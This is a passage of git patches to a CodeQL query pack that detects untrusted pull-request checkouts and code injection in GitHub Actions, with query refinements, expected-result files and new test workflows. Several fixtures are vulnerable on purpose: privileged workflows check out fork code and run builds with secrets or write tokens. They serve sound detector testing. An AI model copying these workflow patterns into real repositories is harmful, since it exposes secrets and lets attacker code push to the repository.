b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -108,8 +108,8 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt exists(StepsExpression e | this.getArgumentExpr("ref") = e and ( - e.getStepId().matches(["%ref%", "%branch%"]) or - e.getFieldName().matches(["%ref%", "%branch%"]) + e.getStepId().matches(["%head%", "%pull_request%", "%_pr_%"]) or + e.getFieldName().matches(["%head%", "%pull_request%", "%_pr_%"]) ) ) ) diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml new file mode 100644 index 00000000000..60ba26406c6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml @@ -0,0 +1,27 @@ +name: Test + +on: + # Runs on pull requests targeting the default branch + pull_request_target: + branches: ["main"] + +jobs: + build: + # Limit permissions of the GITHUB_TOKEN for untrusted code + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@v1 + with: + source: ./ + destination: ./_site + From 16a752280785289f02297e6995bba7a4a97e5ea5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 22 May 2024 23:24:17 +0200 Subject: [PATCH 0307/1267] Improve Untrusted checkout queries --- ql/lib/codeql/actions/ast/internal/Ast.qll | 31 ++++++++++++----- .../security/UntrustedCheckoutQuery.qll | 8 ++--- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- .../CWE-094/CodeInjectionCritical.expected | 2 ++ .../CWE-094/CodeInjectionMedium.expected | 2 -- .../Security/CWE-349/CachePoisoning.expected | 1 + .../CWE-829/.github/workflows/mend.yml | 33 +++++++++++++++++++ .../workflows/priv_pull_request_checkout.yml | 23 +++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 1 + .../UntrustedCheckoutCritical.expected | 2 ++ 11 files changed, 90 insertions(+), 17 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index ebe2c70533d..61f0fa8e36e 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -748,7 +748,13 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the job can be triggered by an external actor. */ predicate isExternallyTriggerable() { - externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) + // the job is triggered by an event that can be triggered externally + externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) or + // the job is triggered by a workflow_call event that can be triggered externally + this.getATriggerEvent().getName() = "workflow_call" and + (exists(ExpressionImpl e, string external_trigger | e.getEnclosingJob() = this and e.getExpression().matches("%github.event" + external_trigger + "%") and externallyTriggerableEventsDataModel(external_trigger)) + or + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isExternallyTriggerable()) } /** Holds if the job is privileged. */ @@ -775,7 +781,9 @@ class JobImpl extends AstNodeImpl, TJobNode { private predicate hasExplicitSecretAccess() { // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | - expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" + (expr.getEnclosingJob() = this or not exists(expr.getEnclosingJob())) and + expr.getEnclosingWorkflow() = this.getEnclosingWorkflow() and + not expr.getFieldName() = "GITHUB_TOKEN" ) } @@ -803,16 +811,21 @@ class JobImpl extends AstNodeImpl, TJobNode { } private predicate hasPrivilegedTrigger() { - // For workflows that are triggered by the pull_request_target event, the GITHUB_TOKEN is granted read/write repository permission unless the permissions key is specified and the workflow can access secrets, even when it is triggered from a fork. - // The Job is triggered by an event other than `pull_request` + // the Job is triggered by an event other than `pull_request` count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent().getName() = ["pull_request", "workflow_call"] + not this.getATriggerEvent().getName() = "pull_request" and + not this.getATriggerEvent().getName() = "workflow_call" or - // The Workflow is a Reusable Workflow only and there is - // a privileged caller workflow - this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() + // the Workflow is a Reusable Workflow only and there is + // a privileged caller workflow or we cant find a caller + count(this.getATriggerEvent()) = 1 and + this.getATriggerEvent().getName() = "workflow_call" and + ( + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or + not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller()) + ) or - // The Workflow has multiple triggers so at least one is not "pull_request" + // the Workflow has multiple triggers so at least one is not "pull_request" count(this.getATriggerEvent()) > 1 } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 3bc1f3649a3..6c3b042d1e7 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -108,8 +108,8 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt exists(StepsExpression e | this.getArgumentExpr("ref") = e and ( - e.getStepId().matches(["%head%", "%pull_request%", "%_pr_%"]) or - e.getFieldName().matches(["%head%", "%pull_request%", "%_pr_%"]) + e.getStepId().matches("%" + ["head", "branch", "ref"] + "%") or + e.getFieldName().matches("%" + ["head", "branch", "ref"] + "%") ) ) ) @@ -138,8 +138,8 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { exists(StepsExpression e | this.getArgumentExpr("ref") = e and ( - e.getStepId().matches(["%sha%", "%commit%"]) or - e.getFieldName().matches(["%sha%", "%commit%"]) + e.getStepId().matches("%" + ["head", "sha", "commit"] + "%") or + e.getFieldName().matches("%" + ["head", "sha", "commit"] + "%") ) ) ) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 649064e1ddd..30aa95964e1 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.28 +version: 0.0.29 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d0d7e48a1b2..4c89d7804a9 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.28 +version: 0.0.29 groups: - actions - queries diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 67c8bbc2b65..ac4761deda1 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -315,6 +315,8 @@ subpaths | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 4fb130aa07a..c69af0316bf 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -283,7 +283,5 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 6bef24d86d7..d434bd63c51 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -9,3 +9,4 @@ | .github/workflows/test11.yml:14:9:19:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Uses Step | | .github/workflows/test15.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Uses Step | | .github/workflows/test16.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Uses Step | +| .github/workflows/test17.yml:15:9:20:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml new file mode 100644 index 00000000000..b539c562084 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml @@ -0,0 +1,33 @@ +name: Test + +on: + workflow_call: + +env: + API_KEY: ${{ secrets.API_KEY != '' && secrets.API_KEY }} + +jobs: + mend: + runs-on: "ubuntu-latest" + steps: + - name: "Set the checkout ref" + id: set_ref + run: | + if [[ "${{ github.event_name }}" == "pull_request_target" ]]; then + echo "ref=${{ github.event.pull_request.head.sha }}" >> $GITHUB_OUTPUT + else + echo "ref=${{ github.ref }}" >> $GITHUB_OUTPUT + fi + + - name: "checkout" + if: success() + uses: "actions/checkout@v4" + with: + fetch-depth: 1 + ref: ${{ steps.set_ref.outputs.ref }} + + - name: "setup ruby" + if: success() + uses: "ruby/setup-ruby@v1" + with: + ruby-version: 2.7 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml new file mode 100644 index 00000000000..d8381176fd2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml @@ -0,0 +1,23 @@ +name: Test + +on: + pull_request: + +permissions: + contents: write + pull-requests: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Check out repo on head ref + uses: actions/checkout@93ea575cb5d8a053eaa0ac8fa3b40d7e05a33cc8 + with: + ref: ${{ github.head_ref }} + token: ${{ secrets.DOCUBOT_REPO_PAT }} + + - run: | + ./cmd + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index dbbfba0a557..b048fb398a4 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -14,4 +14,5 @@ | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref '4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref '1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref '1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index ca86bac14f0..1f90c56607d 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -3,5 +3,7 @@ | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 1fc45eb2969202fda4690a095dd9889746e16e88 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 24 May 2024 09:33:35 +0200 Subject: [PATCH 0308/1267] Improve ControlCheck for untrusted checkouts --- .../security/UntrustedCheckoutQuery.qll | 28 ++++++-- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 6 +- .../CWE-829/UntrustedCheckoutCritical.ql | 7 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 13 ++-- .../CWE-829/UntrustedCheckoutMedium.ql | 6 +- .../CWE-829/.github/workflows/dependabot1.yml | 45 ++++++++++++ .../CWE-829/.github/workflows/dependabot2.yml | 68 +++++++++++++++++++ .../CWE-829/.github/workflows/test2.yml | 20 ++++++ .../UntrustedCheckoutCritical.expected | 2 + .../CWE-829/UntrustedCheckoutHigh.expected | 1 + 10 files changed, 177 insertions(+), 19 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 6c3b042d1e7..ba31b0de500 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -227,7 +227,14 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { } /** An If node that contains an actor, user or label check */ -abstract class ControlCheck extends If { } +abstract class ControlCheck extends If { + predicate dominates(Step step) { + step.getIf() = this or + step.getEnclosingJob().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + } +} class LabelControlCheck extends ControlCheck { LabelControlCheck() { @@ -244,15 +251,28 @@ class LabelControlCheck extends ControlCheck { class ActorControlCheck extends ControlCheck { ActorControlCheck() { - // eg: contains(github.actor, 'dependabot') - // eg: github.triggering_actor != 'CI Agent' + // eg: github.actor == 'dependabot[bot]' + // eg: github.triggering_actor == 'CI Agent' // eg: github.event.pull_request.user.login == 'mybot' exists( normalizeExpr(this.getCondition()) .regexpFind([ "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", "\\bgithub\\.event\\.comment\\.user\\.login\\b", - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + ], _, _) + ) + } +} + +class RepositoryControlCheck extends ControlCheck { + RepositoryControlCheck() { + // eg: github.repository == 'test/foo' + exists( + normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.repository\\b", + "\\bgithub\\.repository_owner\\b", ], _, _) ) } diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index c1118bc00ca..ca1b855c6ec 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -2,9 +2,9 @@ * @name Untrusted Checkout TOCTOU * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. * @kind problem - * @problem.severity warning - * @precision medium - * @security-severity 5.3 + * @problem.severity error + * @precision high + * @security-severity 7.5 * @id actions/untrusted-checkout-toctou/high * @tags actions * security diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 0a597ee3fa4..eae580ebd52 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -21,10 +21,11 @@ from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and j.getAStep() = checkout and + // the checkout is followed by a known poisonable step checkout.getAFollowingStep() instanceof PoisonableStep and - not exists(ControlCheck check | - checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check - ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) and + // the checkout occurs in a privileged context ( inPrivilegedCompositeAction(checkout) or diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 29a15accdf2..9faab24dbcb 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -4,9 +4,9 @@ * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind problem - * @problem.severity warning - * @precision medium - * @security-severity 5.3 + * @problem.severity error + * @precision high + * @security-severity 7.5 * @id actions/untrusted-checkout/high * @tags actions * security @@ -21,10 +21,11 @@ from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and j.getAStep() = checkout and + // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and - not exists(ControlCheck check | - checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check - ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) and + // the checkout occurs in a privileged context ( inPrivilegedCompositeAction(checkout) or diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index aa62a88935b..574c2d7bffe 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -21,9 +21,9 @@ from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and j.getAStep() = checkout and - not exists(ControlCheck check | - checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check - ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) and + // the checkout occurs in a non-privileged context ( inNonPrivilegedCompositeAction(checkout) or inNonPrivilegedJob(checkout) diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml new file mode 100644 index 00000000000..afe1dfab038 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml @@ -0,0 +1,45 @@ +name: Check dist + +on: + pull_request: + push: + branches: + - main + - 'releases/*' + +jobs: + verify-build: # make sure the checked in dist/ folder matches the output of a rebuild + runs-on: ubuntu-latest + + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - name: Read .nvmrc + id: nvm + run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: ${{ steps.nvm.outputs.NVMRC }} + + - name: Install npm dependencies + run: npm clean-install + + - name: Rebuild the dist/ directory + run: npm run package + + - name: Compare the expected and actual dist/ directories + run: script/check-diff + verify-index-js: # make sure the entrypoint js files run on a clean machine without compiling first + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: ./ + with: + milliseconds: 1000 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml new file mode 100644 index 00000000000..072eae4b1d2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml @@ -0,0 +1,68 @@ +name: Compile dependabot updates + +on: + pull_request: + +permissions: + pull-requests: write + contents: write +jobs: + fetch-dependabot-metadata: + runs-on: ubuntu-latest + # We only want to check the metadata on pull_request events from Dependabot itself, + # any subsequent pushes to the PR should just skip this step so we don't go into + # a loop on commits created by the `build-dependabot-changes` job + if: ${{ github.actor == 'dependabot[bot]' }} + # Map the step output to a job output for subsequent jobs + outputs: + dependency-type: ${{ steps.dependabot-metadata.outputs.dependency-type }} + package-ecosystem: ${{ steps.dependabot-metadata.outputs.package-ecosystem }} + steps: + - name: Fetch dependabot metadata + id: dependabot-metadata + uses: dependabot/fetch-metadata@c9c4182bf1b97f5224aee3906fd373f6b61b4526 # v1.6.0 + with: + github-token: "${{ secrets.GITHUB_TOKEN }}" + build-dependabot-changes: + runs-on: ubuntu-latest + needs: [fetch-dependabot-metadata] + # We only need to build the dist/ folder if the PR relates to Docker or an npm dependency + if: needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'docker' || needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'npm_and_yarn' + steps: + # Check out using a PAT so any pushed changes will trigger checkruns + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + token: ${{ secrets.DEPENDABOT_AUTOBUILD }} + + - name: Read .nvmrc + id: nvm + run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: ${{ steps.nvm.outputs.NVMRC }} + + - name: Install npm dependencies + run: npm clean-install + + # If we're reacting to a Docker PR, we have on extra step to refresh and check in the container manifest, + # this **must** happen before rebuilding dist/ so it uses the new version of the manifest + - name: Rebuild docker/containers.json + if: needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'docker' + run: | + npm run update-container-manifest + git add docker/containers.json + + - name: Rebuild the dist/ directory + run: npm run package + + - name: Check in any change to dist/ + run: | + git add dist/ + # Specifying the full email allows the avatar to show up: https://github.com/orgs/community/discussions/26560 + git config user.name "github-actions[bot]" + git config user.email "41898282+github-actions[bot]@users.noreply.github.com" + git commit -m "[dependabot skip] Update dist/ with build changes" || exit 0 + git push diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml new file mode 100644 index 00000000000..64e4992b5ca --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml @@ -0,0 +1,20 @@ +name: "Frogbot Scan Pull Request" +on: + pull_request_target: + types: [ opened, synchronize ] +permissions: + pull-requests: write + contents: read +jobs: + scan-pull-request: + runs-on: ubuntu-latest + environment: frogbot + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: jfrog/frogbot@8fbeca612957ae5f5f0c03a19cb6e59e237026f3 # v2.10.0 + env: + JF_URL: ${{ secrets.JF_URL }} + JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} + JF_GIT_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 1f90c56607d..2660a726ab6 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ 